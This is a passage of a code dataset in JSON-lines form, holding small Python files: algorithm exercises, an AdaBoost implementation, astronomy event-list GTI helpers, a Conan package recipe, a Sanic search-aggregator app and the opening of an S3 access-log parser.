T_x\n\ndef det(A):\n return _det(A)\n\nM.set_eps(det)\n\n\nnp.random.seed(args.seed)\nnum_stages = np.random.randint(2, 6) \nnum_layers = 2 #np.random.randint(1, 3)\nnum_units = np.random.randint(15, max(30, D))\n\ninit_params = {'loc':0., 'scale':5.}\nq_theta, opt_data, save_path = M.epi(\n mu, \n arch_type='coupling', \n num_stages=num_stages,\n num_layers=num_layers,\n num_units=num_units,\n post_affine=False,\n batch_norm=False,\n init_params=init_params,\n K=10, \n num_iters=2500, \n N=1000,\n lr=1e-3, \n c0=1e-1, \n beta=10.,\n verbose=True,\n stop_early=True,\n log_rate=50,\n save_movie_data=True,\n)\nprint(\"EPI done.\")\nprint(\"Saved to %s.\" % save_path)\n","sub_path":"scripts/old/matrix_det_epi.py","file_name":"matrix_det_epi.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273737372","text":"f1 = open('dictionaryEasy.txt','w')\nf2 = open('dictionaryMed.txt','w')\nf3 = open('dictionaryHard.txt','w')\n\nwith open('dictionary.txt') as fp:\n\tfor line in fp:\n\t\tfor word in line.split():\n\t\t\tl = len(word)\n\t\t\tif l>=4 and l<=5:\n\t\t\t\tf1.write(word + '\\n')\n\t\t\telif l>=6 and l<=7:\n\t\t\t\tf2.write(word + '\\n')\n\t\t\telif l>=8 and l<=10:\n\t\t\t\tf3.write(word + '\\n')\n\nf1.close()\nf2.close()\nf3.close()\n","sub_path":"tmp/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345243776","text":"\nimport cv2\n\n\nclass Video_Reader():\n\n def __init__(self, video_path):\n\n self.video_path = 
video_path\n        self.cap = cv2.VideoCapture(video_path)\n\n        assert self.cap.isOpened(), \"Error opening video stream or file\"\n\n    def __del__(self):\n        self.cap.release()\n\n    def reset(self):\n        self.cap.release()\n        self.cap = cv2.VideoCapture(self.video_path)\n        assert self.cap.isOpened(), \"Error opening video stream or file\"\n\n        return 0\n\n    def get_frame(self):\n\n        ret = False\n        frame = None\n\n        if (not self.cap.isOpened()):\n            print('Video completed.')\n            return (ret, frame)\n\n        ret, frame = self.cap.read()\n\n        return (ret, frame)\n\n","sub_path":"utils/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415457475","text":"\"\"\"\nCount how many times a particular digit occurs in an entered\nsequence of numbers. The number of values entered and the digit\nto count are supplied from the keyboard.\n\"\"\"\n\ncount = 0\n\nseq = input(\"Enter a sequence of digits: \")\ndigit = input(\"Enter the digit to find: \")\n\nfor c in seq:\n    if c == digit:\n        count += 1\n\nprint(f\"The digit '{digit}' occurs {count} times in the sequence '{seq}'\")","sub_path":"algorythms/lesson2/lesson_2_task8.py","file_name":"lesson_2_task8.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35622984","text":"import sys\nimport string\nfrom collections import deque\n\n\nstates = [[], []]\ndQ = deque()\nnCannibals = 0\nnMissionaries = 0\nallowedOnBoat = 0\ncombinations = [ ]\n\n\ndef getCombindations():\n    global allowedOnBoat, combinations\n\n    for i in range(0,allowedOnBoat+1):\n        for j in range(0,allowedOnBoat+1):\n            if i+j>0 and i+j<=allowedOnBoat:\n                combinations.append((i,j))\n\n\ndef initStates():\n    global nCannibals, nMissionaries, states\n    for i in range(0, nCannibals+1):\n        states[0].append([])\n        states[1].append([])\n        for j in range(0, nMissionaries+1):\n            states[0][i].append(-1)\n            states[1][i].append(-1)\n\n\ndef validState(nCannibals, nMissionaries):\n    return (nMissionaries>=nCannibals) or (nMissionaries==0) or (nCannibals==0)\n\n\ndef BFS():\n    global dQ, states, nCannibals, nMissionaries, allowedOnBoat, combinations\n\n    while (len(dQ) > 0) and states[1][nCannibals][nMissionaries] == -1:\n        (x,y,depth,boat) = dQ.popleft()\n\n        present = boat\n        next = 1-boat\n\n        if states[present][x][y] != -1:\n            continue\n\n        states[present][x][y] = depth\n\n        for comb in combinations:\n            (dx,dy) = comb\n\n            if x>=dx and y>=dy:\n                new_st = (nCannibals-(x-dx),nMissionaries-(y-dy),depth+1,next)\n                (lx,ly) = (nCannibals-(x-dx),nMissionaries-(y-dy))\n                (rx,ry) = (nCannibals-lx,nMissionaries-ly)\n\n                if validState(lx, ly) and validState(rx, ry) \\\n                        and states[next][lx][ly] == -1:\n                    dQ.append(new_st)\n\n\n\ndef main():\n    global dQ, nCannibals, nMissionaries, allowedOnBoat, combinations, states\n    input_val = input().split()\n    nCannibals = int(input_val[0])\n    nMissionaries = int(input_val[1])\n    allowedOnBoat = int(input_val[2])\n    initStates()\n    getCombindations()\n\n    dQ.append((nCannibals, nMissionaries, 0, 0))\n    BFS()\n\n    print(states[1][nCannibals][nMissionaries])\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())","sub_path":"missionary_cannibals.py","file_name":"missionary_cannibals.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
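The missionary_cannibals.py record above pre-allocates two visited matrices and threads its state through module globals. The same breadth-first search reads more compactly with a visited set; a self-contained sketch (the names here are illustrative, not from the record):

```python
from collections import deque

def bfs_crossings(cannibals, missionaries, boat_capacity):
    """Fewest crossings to ferry everyone across, or -1 if impossible."""
    def safe(c, m):
        # A bank is safe if missionaries are absent or not outnumbered.
        return m == 0 or m >= c

    moves = [(c, m) for c in range(boat_capacity + 1)
             for m in range(boat_capacity + 1) if 0 < c + m <= boat_capacity]
    start = (cannibals, missionaries, 0)      # left-bank counts plus boat side
    queue, seen = deque([(start, 0)]), {start}
    while queue:
        (c, m, side), depth = queue.popleft()
        if (c, m) == (0, 0):
            return depth
        sign = -1 if side == 0 else 1         # the boat leaves the side it is on
        for dc, dm in moves:
            nc, nm = c + sign * dc, m + sign * dm
            state = (nc, nm, 1 - side)
            if (0 <= nc <= cannibals and 0 <= nm <= missionaries
                    and safe(nc, nm) and safe(cannibals - nc, missionaries - nm)
                    and state not in seen):
                seen.add(state)
                queue.append((state, depth + 1))
    return -1

print(bfs_crossings(3, 3, 2))  # classic 3/3 puzzle with a 2-seat boat: 11
```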
+{"seq_id":"378288492","text":"#\r\nn = int(input())\r\na = list(map(int, input().split()))\r\nF = [0] * n\r\nfor i in range(n):\r\n for j in range(i):\r\n if a[i] % a[j] == 0 and F[j] > F[i]:\r\n F[i] = F[j]\r\n F[i] += 1\r\nprint(max(F))\r\n\r\n","sub_path":"BGQ.py","file_name":"BGQ.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20092050","text":"def reverseWords(s):\n \"\"\"\n :type s: str\n :rtype: str\n\n idea:\n ' xx '\n FF, TF, TT, FT, FF\n \"\"\"\n prev = None\n isWord = False\n wasWord = False\n re = []\n s = ' ' + s + ' '\n for i, ch in enumerate(s):\n isWord = True if ch is not ' ' else False\n if not isWord and wasWord: #FT to append\n re.insert(0, s[prev:i])\n if isWord and not wasWord: #TF to update prev\n prev = i\n wasWord = isWord\n #re.reverse()\n return ' '.join(re)\n\nprint(reverseWords(\"the sky is blue\"))\nprint(reverseWords(\" the sky is blue \"))\n\n# Note .reverse() function changes obj locally\n# cannnot be a var in anotehr fuction, bc it return NoneType\n","sub_path":"Python/151_Reverse_Words_in_a_String.py","file_name":"151_Reverse_Words_in_a_String.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544533737","text":"import numpy as np\n\nfrom stingray.events import EventList\nfrom stingray.gti import join_gtis\nfrom model.table import Table\nimport bisect\nimport utils.dave_logger as logging\n\n\n# Returns an Stingray EventList from a given dataset\ndef get_eventlist_from_dataset(dataset, axis):\n\n if not is_events_dataset(dataset):\n logging.warn(\"get_eventlist_from_dataset: dataset is not a events dataset instance\")\n return None\n\n # Extract axis values\n time_data = np.array(dataset.tables[axis[0][\"table\"]].columns[axis[0][\"column\"]].values)\n pi_data = np.array(dataset.tables[axis[1][\"table\"]].columns[axis[1][\"column\"]].values)\n\n # Extract GTIs\n gti = get_stingray_gti_from_gti_table (dataset.tables[\"GTI\"])\n\n # Returns the EventList\n if len(gti) > 0:\n return EventList(time_data, gti=gti, pi=pi_data)\n else:\n return EventList(time_data, pi=pi_data)\n\n\ndef get_empty_gti_table():\n table = Table(\"GTI\")\n table.add_columns([\"START\", \"STOP\"])\n return table\n\n\ndef get_gti_table(from_val, to_val):\n table = get_empty_gti_table()\n table.columns[\"START\"].add_value(from_val)\n table.columns[\"STOP\"].add_value(to_val)\n return table\n\n\n# Finds the idx of the nearest value on the array, array must be sorted\ndef find_idx_nearest_val(array, value):\n\n # idx = np.searchsorted(array, value, side=\"left\")\n idx = bisect.bisect_left(array, value) #  Looks like bisec is faster with structured data than searchsorted\n\n if idx >= len(array):\n idx_nearest = len(array) - 1\n elif idx == 0:\n idx_nearest = 0\n else:\n if abs(value - array[idx - 1]) < abs(value - array[idx]):\n idx_nearest = idx - 1\n else:\n idx_nearest = idx\n return idx_nearest\n\n\ndef is_events_dataset(dataset):\n return is_hdu_dataset(dataset, \"EVENTS\")\n\n\ndef is_lightcurve_dataset(dataset):\n return is_hdu_dataset(dataset, \"RATE\")\n\n\ndef is_hdu_dataset(dataset, hduname):\n if dataset:\n if hduname in dataset.tables:\n if \"TIME\" in dataset.tables[hduname].columns:\n if \"GTI\" in dataset.tables:\n return True\n return False\n\n\ndef is_gti_dataset(dataset):\n if dataset:\n if \"GTI\" in dataset.tables:\n if \"START\" in dataset.tables[\"GTI\"].columns:\n 
return True\n return False\n\n\ndef get_events_dataset_start(dataset):\n if len(dataset.tables[\"EVENTS\"].columns[\"TIME\"].values) > 0:\n return dataset.tables[\"EVENTS\"].columns[\"TIME\"].values[0]\n return 0\n\n\ndef get_stingray_gti_from_gti_table (gti_table):\n return np.array([[a, b]\n for a, b in zip(gti_table.columns[\"START\"].values,\n gti_table.columns[\"STOP\"].values)],\n dtype=np.longdouble)\n\n\ndef get_gti_table_from_stingray_gti (gti):\n gti_table = get_empty_gti_table()\n gti_table.columns[\"START\"].add_values(gti[:, 0])\n gti_table.columns[\"STOP\"].add_values(gti[:, 1])\n return gti_table\n\n\ndef join_gti_tables(gti_table_0, gti_table_1):\n if not gti_table_0:\n logging.warn(\"join_gti_tables: gti_table_0 is None, returned gti_table_1\")\n return gti_table_1\n\n if not gti_table_1:\n logging.warn(\"join_gti_tables: gti_table_1 is None, returned gti_table_0\")\n return gti_table_0\n\n gti_0 = get_stingray_gti_from_gti_table (gti_table_0)\n gti_1 = get_stingray_gti_from_gti_table (gti_table_1)\n joined_gti = join_gtis(gti_0, gti_1)\n\n return get_gti_table_from_stingray_gti(joined_gti)\n\n\n# Returns a list of columns excluding passed columnName\ndef get_additional_column_names(columns, column):\n additional_columns = []\n for column_name in columns:\n if column_name != column:\n additional_columns.extend([column_name])\n return additional_columns\n\n\n# Returns a dictionary with the values of the table columns values\ndef get_columns_as_dict(columns, column):\n ds_columns = dict()\n for column_name in columns:\n if column_name != column:\n ds_columns[column_name] = columns[column_name].values\n return ds_columns\n\n\n# Returns a new dataset filtered by a GTI_Dataset\ndef get_dataset_applying_gti_dataset(src_dataset, gti_dataset, hduname=\"EVENTS\", column='TIME'):\n\n if not is_events_dataset(src_dataset):\n logging.warn(\"get_dataset_applying_gti_dataset: src_dataset is not a events dataset instance\")\n return None\n\n if not is_gti_dataset(gti_dataset):\n logging.warn(\"get_dataset_applying_gti_dataset: gti_dataset is not a gti dataset instance\")\n return None\n\n # Creates the new dataset\n dataset = src_dataset.clone(False)\n additional_columns = get_additional_column_names(dataset.tables[hduname].columns, column)\n hdu_table = src_dataset.tables[hduname]\n\n st_gtis = get_stingray_gti_from_gti_table(gti_dataset.tables[\"GTI\"])\n ev_list = hdu_table.columns[column].values\n ds_columns = get_columns_as_dict (src_dataset.tables[hduname].columns, column)\n\n # Gets start time of observation\n events_start_time = 0\n if \"TSTART\" in hdu_table.header:\n events_start_time = float(hdu_table.header[\"TSTART\"])\n\n gti_start = st_gtis[:, 0] - events_start_time\n gti_end = st_gtis[:, 1] - events_start_time\n\n update_dataset_filtering_by_gti (dataset.tables[hduname], dataset.tables[\"GTI\"],\n ev_list, ds_columns, gti_start, gti_end, additional_columns, column)\n return dataset\n\n\n# Returns a Dataset filtered by Gtis\ndef update_dataset_filtering_by_gti(hdu_table, gti_table, ev_list, ds_columns, gti_start, gti_end,\n additional_columns, column='TIME',\n filter_start=None, filter_end=None, must_filter=False):\n start_event_idx = 0\n end_event_idx = 0\n\n for gti_index in range(len(gti_start)):\n\n start = gti_start[gti_index]\n end = gti_end[gti_index]\n\n is_valid_gti = True\n if must_filter:\n is_valid_gti = ((filter_start <= start) and (filter_end >= end))\n if not is_valid_gti:\n if (filter_start < end) and (filter_end > end):\n start = filter_start\n 
is_valid_gti = True\n elif (filter_start < start) and (filter_end > start):\n end = filter_end\n is_valid_gti = True\n elif (filter_start >= start) and (filter_end <= end):\n start = filter_start\n end = filter_end\n is_valid_gti = True\n\n if is_valid_gti:\n start_event_idx = find_idx_nearest_val(ev_list, start)\n if (ev_list[start_event_idx] < start and start_event_idx < len(ev_list) - 1):\n start_event_idx = start_event_idx + 1\n\n end_event_idx = find_idx_nearest_val(ev_list, end)\n if (ev_list[end_event_idx] > end and end_event_idx > 0):\n end_event_idx = end_event_idx - 1\n\n if end_event_idx >= start_event_idx:\n # The GTI has ended, so lets insert it on dataset\n\n gti_table.columns[\"START\"].add_value(start)\n gti_table.columns[\"STOP\"].add_value(end)\n gti_table.columns[\"START_EVENT_IDX\"].add_value(start_event_idx)\n gti_table.columns[\"END_EVENT_IDX\"].add_value(end_event_idx)\n\n # Insert values at range on dataset\n hdu_table.columns[column].add_values(ev_list[start_event_idx:end_event_idx])\n for i in range(len(additional_columns)):\n ad_column=additional_columns[i]\n values=ds_columns[ad_column][start_event_idx:end_event_idx]\n hdu_table.columns[ad_column].add_values(values)\n\n else:\n logging.info(\"No data point in GTI # %s: GTI (from, to)=(%f, %f); event list (from, to)=(%d, %d)\" % (gti_index, start, end, start_event_idx, end_event_idx))\n","sub_path":"src/main/python/utils/dataset_helper.py","file_name":"dataset_helper.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128265614","text":"from sanic import Sanic, response\nimport asyncio\nimport concurrent.futures\nimport requests\nimport tweepy\nimport os\n\ntwitter_auth = tweepy.OAuthHandler('', '')\ntwitter_auth.set_access_token('', '')\ntwitter_api = tweepy.API(twitter_auth)\n\napp = Sanic()\n\nNO_RESULTS_JSON = {\"error\": -1, \"message\": \"No Results\"}\nRESULT_JSON = lambda x: {\"text\": x}\nTIMEOUT_JSON = {\"error\": -1, \"message\": \"execution timed out\"}\n\ndef get_google_result(q):\n res = requests.get(\"https://www.googleapis.com/customsearch/v1?key=&cx=011634103780127050272%3A8dm3slkgwwg&q={}&start=1&num=1\".format(q)).json()\n if res['items']:\n return RESULT_JSON(res['items'][0]['snippet'])\n return NO_RESULTS_JSON\n\ndef get_duckduckgo_result(q):\n res = requests.get(\"http://api.duckduckgo.com/?q={}&format=json\".format(q)).json()\n if res['RelatedTopics']:\n return RESULT_JSON(res['RelatedTopics'][0]['Text'])\n return NO_RESULTS_JSON\n\ndef get_twitter_result(q):\n res = twitter_api.search(q, count=1)\n if len(res):\n return RESULT_JSON(res.pop().text)\n return NO_RESULTS_JSON\n\n@app.route(\"/\")\nasync def home(request):\n q = request.args.get('q')\n res = {\"query\": q, \"google\": TIMEOUT_JSON, \"twitter\": TIMEOUT_JSON, \"duckduckgo\": TIMEOUT_JSON}\n with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n future_to_result = {\n executor.submit(engine['fun'], q): engine['engine'] for engine in [{\n \"engine\": \"google\",\n \"fun\": get_google_result\n }, {\n \"engine\": \"duckduckgo\",\n \"fun\": get_duckduckgo_result\n }, {\n \"engine\": \"twitter\",\n \"fun\": get_twitter_result\n }]\n }\n try:\n # As and when results are available push them into res[Response]. 
Timeout set to 1\n for future in concurrent.futures.as_completed(future_to_result, 1):\n engine = future_to_result[future]\n try:\n data = future.result()\n except Exception as exc:\n res[engine] = {\"error\": -1, \"message\": \"Something went wrong!\"}\n else:\n res[engine] = data\n except Exception as err:\n # In case of timeout timed out calls will continue to have the initial TIMEOUT_JSON. Ones that succeeded will have actual result.\n pass\n return response.json(res)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"127592897","text":"# The prime 41, can be written as the sum of six consecutive primes:\n#\n# 41 = 2 + 3 + 5 + 7 + 11 + 13\n# This is the longest sum of consecutive primes that adds to a prime\n# below one-hundred.\n#\n# The longest sum of consecutive primes below one-thousand that adds\n# to a prime, contains 21 terms, and is equal to 953.\n#\n# Which prime, below one-million, can be written as the sum of the most\n# consecutive primes?\n\nfrom time import time\nimport sys\nsys.path.append(\"../Library\")\nfrom peresult import peresult\nfrom primefns import primesbelow\n\ndef solve(cap = 1000000):\n primes = primesbelow(cap)\n # Find max number of primes that, when concatenated, sum to less than cap\n initial_prime_sum = 0\n end_index = -1\n while initial_prime_sum + primes[end_index + 1] < cap:\n end_index += 1\n initial_prime_sum += primes[end_index]\n if initial_prime_sum in primes:\n return initial_prime_sum # This probably won't happen, but safety first\n for length in range(end_index + 1, 0, -1):\n # initial_prime_sum is the max sum below cap of primes with given length\n start_index = end_index - length + 1\n while initial_prime_sum - primes[start_index] + primes[end_index] < cap:\n initial_prime_sum += -primes[start_index] + primes[end_index]\n end_index += 1\n start_index += 1\n # Add a prime to the beginning and trim a prime from the end\n # Do this until either we run out of primes or the total is prime\n new_prime_sum = initial_prime_sum\n new_end_index = end_index\n new_start_index = start_index\n while new_prime_sum not in primes and new_start_index > 0:\n new_start_index -= 1\n new_end_index -= 1\n new_prime_sum += primes[new_start_index] - primes[new_end_index + 1]\n if new_prime_sum in primes:\n return new_prime_sum\n # No chains of given length sum to a prime. Trim one from the start\n initial_prime_sum -= primes[start_index]\n\nif __name__ == \"__main__\":\n start = time()\n peresult(50, solve(10 ** 6), time() - start)\n","sub_path":"Problems 1-100/p050_ConsecutivePrimeSum.py","file_name":"p050_ConsecutivePrimeSum.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627617583","text":"# Take 5 integer inputs from user and store them in a list.\n# Again ask user to give a number. 
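The app.py record above pre-fills each engine's slot with TIMEOUT_JSON so that a timeout inside `as_completed` degrades gracefully to partial results. A runnable sketch of that pattern, with dummy workers standing in for the real search calls:

```python
import concurrent.futures
import time

TIMEOUT_JSON = {"error": -1, "message": "execution timed out"}

def fast():
    return {"text": "fast result"}

def slow():
    time.sleep(5)  # deliberately exceeds the one-second deadline
    return {"text": "slow result"}

# Every slot starts as TIMEOUT_JSON; only completed futures overwrite it.
results = {"fast": TIMEOUT_JSON, "slow": TIMEOUT_JSON}
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
    futures = {executor.submit(fn): name for name, fn in [("fast", fast), ("slow", slow)]}
    try:
        for future in concurrent.futures.as_completed(futures, timeout=1):
            results[futures[future]] = future.result()
    except concurrent.futures.TimeoutError:
        pass  # untouched slots keep their TIMEOUT_JSON sentinel

print(results)  # fast carries its result; slow keeps the timeout sentinel
# Caveat: leaving the with-block still joins the worker threads, so the
# process itself waits for slow() even though results were sealed at 1 s.
```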
Now, tell user whether that number is present in list or not.\n\nlst = []\n\nfor i in range(1,6):\n value = int(input(\"Enter {} number : \".format(i)))\n lst.append(value)\n\nsearch = int(input(\"Enter number to check present or not : \"))\n\nif search in lst:\n print(\"Present\")\nelse:\n print(\"Not Present\")","sub_path":"list_10.py","file_name":"list_10.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564806795","text":"from conans import ConanFile, Meson, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.29.0\"\n\nclass LibnameConan(ConanFile):\n name = \"graphene\"\n description = \"A thin layer of graphic data types.\"\n topics = (\"conan\", \"graphene\")\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"http://ebassi.github.io/graphene/\"\n license = \"MIT\"\n generators = \"pkg_config\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"with_glib\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"with_glib\": True,\n }\n\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n if self.settings.compiler == \"gcc\":\n if tools.Version(self.settings.compiler.version) < \"5.0\":\n raise ConanInvalidConfiguration(\"graphene does not support GCC before 5.0\")\n \n def build_requirements(self):\n self.build_requires(\"meson/0.57.1\")\n self.build_requires(\"pkgconf/1.7.3\")\n \n def requirements(self):\n if self.options.with_glib:\n self.requires(\"glib/2.67.6\")\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = self.name + \"-\" + self.version\n os.rename(extracted_dir, self._source_subfolder)\n\n def _configure_meson(self):\n meson = Meson(self)\n defs = {}\n defs[\"gobject_types\"] = \"true\" if self.options.with_glib else \"false\"\n if tools.Version(self.version) < \"1.10.4\":\n defs[\"introspection\"] = \"false\"\n else:\n defs[\"introspection\"] = \"disabled\"\n defs[\"tests\"] = \"false\"\n defs[\"installed_tests\"] = \"false\"\n defs[\"gtk_doc\"] = \"false\"\n args=[]\n args.append(\"--wrap-mode=nofallback\")\n meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)\n return meson\n\n def build(self):\n with tools.environment_append(tools.RunEnvironment(self).vars):\n meson = self._configure_meson()\n meson.build()\n\n def package(self):\n self.copy(pattern=\"LICENSE.txt\", dst=\"licenses\", src=self._source_subfolder)\n meson = self._configure_meson()\n with tools.environment_append({\"PKG_CONFIG_PATH\": self.install_folder}):\n meson.install()\n \n if self.settings.compiler == \"Visual Studio\" and not self.options.shared:\n with tools.chdir(os.path.join(self.package_folder, \"lib\")):\n if os.path.isfile(\"libgraphene-1.0.a\"):\n tools.rename(\"libgraphene-1.0.a\", \"graphene-1.0.lib\")\n \n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n tools.remove_files_by_mask(self.package_folder, \"*.pdb\")\n\n def package_info(self):\n 
self.cpp_info.components[\"graphene-1.0\"].libs = [\"graphene-1.0\"]\n self.cpp_info.components[\"graphene-1.0\"].includedirs = [os.path.join(\"include\", \"graphene-1.0\"), os.path.join(\"lib\", \"graphene-1.0\", \"include\")]\n self.cpp_info.components[\"graphene-1.0\"].names[\"pkg_config\"] = \"graphene-1.0\"\n if self.options.with_glib:\n self.cpp_info.components[\"graphene-1.0\"].requires = [\"glib::gobject-2.0\"]\n\n if self.options.with_glib:\n self.cpp_info.components[\"graphene-gobject-1.0\"].includedirs = [os.path.join(\"include\", \"graphene-1.0\")]\n self.cpp_info.components[\"graphene-gobject-1.0\"].names[\"pkg_config\"] = \"graphene-gobject-1.0\"\n self.cpp_info.components[\"graphene-gobject-1.0\"].requires = [\"graphene-1.0\", \"glib::gobject-2.0\"]\n","sub_path":"recipes/graphene/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430598435","text":"import pathlib\nimport pkg_resources\n\nfrom setuptools import setup\n\n# https://stackoverflow.com/a/59971469\nwith pathlib.Path('requirements.txt').open() as requirements_txt:\n content = '\\n'.join(filter(lambda line: not line.startswith('-i '), requirements_txt.read().split('\\n')))\n install_requires = [\n str(requirement) for requirement in pkg_resources.parse_requirements(content)\n ]\n\nsetup(\n name='Flask-Boto3',\n version='0.9.0',\n url='https://github.com/Ketouem/flask-boto3',\n license='MIT',\n author='Cyril \"Ketouem\" Thomas',\n author_email='ketouem@gmail.com',\n description='Flask extension that ties boto3 to the application',\n packages=['flask_boto3'],\n zip_safe=False,\n include_package_data=True,\n test_suite='tests',\n install_requires=install_requires,\n platforms='any',\n classifiers=[\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132322119","text":"import numpy as np\n\n\ndef loadDataSet(fileName):\n numFeat = len(open(fileName).readline().split('\\t'))\n dataMat = []\n labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n curLine = line.strip().split('\\t')\n lineArr = []\n for i in range(numFeat - 1):\n lineArr.append(curLine[i])\n dataMat.append(lineArr)\n labelMat.append(curLine[-1])\n return dataMat, labelMat\n\n\ndef stumpClassify(dataMatrix, dimen, threshVal, threshIneq):#将数据进行阈值分类\n retArray = np.ones((np.shape(dataMatrix)[0], 1))\n if threshIneq == 'lt':\n retArray[dataMatrix[:, dimen] <= threshVal] = -1.0\n else:\n retArray[dataMatrix[:, dimen] > threshVal] = -1.0\n return retArray\n\n\ndef buildStump(dataArr, classLabels, D):\n dataMatrix = np.mat(dataArr)\n labelMat = np.mat(classLabels)\n m, n = np.shape(dataMatrix)\n numSetps = 10\n bestStump = {}\n bestClassEst = np.mat(np.zeros((m, 1)))\n minError = np.inf\n for i in range(n):\n rangeMin = dataMatrix[:, i].min()\n rangeMax = dataMatrix[:, i].max()\n stepSzie = (rangeMax - rangeMin) / numSetps\n for j in range(-1, int(stepSzie + 1)):\n for inequal in ['lt', 'gt']:\n threshVal = (rangeMin + float(j) * stepSzie)\n predictedVals 
= stumpClassify(dataMatrix, i, threshVal, inequal)\n errArr = np.mat(np.ones((m, 1)))\n errArr[predictedVals == labelMat] = 0\n weightedError = D.T*errArr\n if weightedError < minError:\n minError = weightedError\n bestClassEst = predictedVals.copy()\n bestStump['dim'] = i\n bestStump['thresh'] = threshVal\n bestStump['ineq'] = inequal\n return bestStump, minError, bestClassEst\n\n\ndef adaBoostTrainDS(dataArr, classLabels, numIter = 40):\n weakClassArr = []\n m, n = np.shape(dataArr)\n D = np.mat(np.ones((m, 1)) / m)\n aggClassEst = np.mat(np.zeros((m, 1)))\n for i in range(numIter):\n bestStump, error, classEst = buildStump(dataArr, classLabels, D)\n alpha = float(0.5*np.log((1-error) / max(error, 1e-16)))\n bestStump['alpha'] = alpha\n weakClassArr.append(bestStump)\n expon = np.multiply(-1*alpha*np.mat(classLabels).T, classEst) #????????????????\n D = np.multiply(D, np.exp(expon))\n D = D/sum(D)\n aggClassEst += alpha*classEst\n aggErrors = np.multiply(np.sign(aggClassEst) != classLabels.T, np.ones((m, 1)))\n errorRate = aggErrors.sum()/m\n if errorRate == 0.0:\n break\n return weakClassArr\n\ndef adaClassify(datToclass, classifierArr):\n dataMatrix = np.mat(datToclass)\n m = np.shape(dataMatrix)[0]\n aggClassEst = np.mat(np.zeros((m ,1)))\n for i in range(len(classifierArr)):\n classEst = stumpClassify(dataMatrix, classifierArr[i]['dim'], classifierArr[i]['thresh'], classifierArr[i]['ineq'])\n aggClassEst += classifierArr[i]['alpha']*classEst\n return np.sign(aggClassEst)\n\n\n\n\n\n\n","sub_path":"machine_learning/AdaBoost_单层决策树/myself_adaboost.py","file_name":"myself_adaboost.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329040933","text":"from __future__ import print_function\n\nimport boto3\nimport re\nimport os\nimport json\nimport logging\nfrom datetime import datetime, date\nfrom botocore.awsrequest import AWSRequest\nfrom botocore.auth import SigV4Auth\nfrom botocore.endpoint import PreserveAuthSession\nfrom botocore.credentials import Credentials\nfrom botocore import exceptions as Botoxeption\n\n##################################################\n# Elasticsearch host name\nES_HOST = \"172.31.38.225:9200\"\n\n# Elasticsearch prefix for index name\nINDEX_PREFIX = \"s3_access_log\"\n\n#################################################\n# S3 access log format keys\nS3_KEYS = [\"owner_id\", \"bucket\", \"@timestamp\", \"client_ip\", \"requester\", \"request_id\", \"operation\",\n \"key\", \"request_uri\", \"http_status_code\", \"error_code\",\n \"bytes_send\", \"object_size\", \"total_time\", \"turn_around_time\", \"referrer\", \"user_agent\", \"version_id\"]\n\n# S3 access log format regex\nS3_REGEX = '(\\S+) (\\S+) \\[(.*?)\\s\\+0000\\] (\\S+) (\\S+) ' \\\n r'(\\S+) (\\S+) (\\S+) \"([^\"]+)\" ' \\\n 